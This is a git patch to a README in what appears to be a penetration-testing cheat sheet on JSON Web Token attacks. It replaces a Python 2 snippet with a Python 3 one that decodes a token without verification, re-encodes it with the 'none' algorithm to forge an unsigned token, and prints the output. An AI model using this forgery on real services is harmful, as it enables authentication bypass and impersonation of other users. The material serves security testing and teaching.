From c9fcb58d57f1097a2351f713413627752f7d88df Mon Sep 17 00:00:00 2001 From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com> Date: Sat, 4 Apr 2020 16:03:56 +0500 Subject: [PATCH] Using JWT's module to encode payload with type `None` Before the JWT was being encoded/decoded and that was done manually. The JWT's module does all that without manual decoding and splitting. This PR contains the code to encode the JWT token with type None while using JWT's library in python. --- JSON Web Token/README.md | 38 +++++++++++++------------------------- 1 file changed, 13 insertions(+), 25 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index a6fb080..c4063d8 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -100,37 +100,25 @@ To exploit this vulnerability, you just need to decode the JWT and change the al However, this won't work unless you **remove** the signature -The following code is a basic test for a None algorithm. - -```python -import jwt -import base64 - -def b64urlencode(data): - return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '') - -print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \ - '.' + b64urlencode("{\"data\":\"test\"}") + '.' -``` - Alternatively you can modify an existing JWT (be careful with the expiration time) -```python -#!/usr/bin/python +```python3 +#!/usr/bin/python3 # -*- coding: utf-8 -*- -jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ" -header, payload, signature = jwt.split('.') +import jwt -# Replacing the ALGO and the payload username -header = header.decode('base64').replace('HS256',"none") -payload = (payload+"==").decode('base64').replace('test','admin') +jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ' -header = header.encode('base64').strip().replace("=","") -payload = payload.encode('base64').strip().replace("=","") +decodedToken = jwt.decode(jwtToken, verify=False) # Need to decode the token before encoding with type 'None' +noneEncoded = jwt.encode(decodedToken, key='', algorithm=None) -# 'The algorithm 'none' is not supported' -print( header+"."+payload+".") +print(noneEncoded.decode()) + +""" +Output: +eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0. +""" ``` ## JWT Signature - RS256 to HS256 @@ -290,4 +278,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) -- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)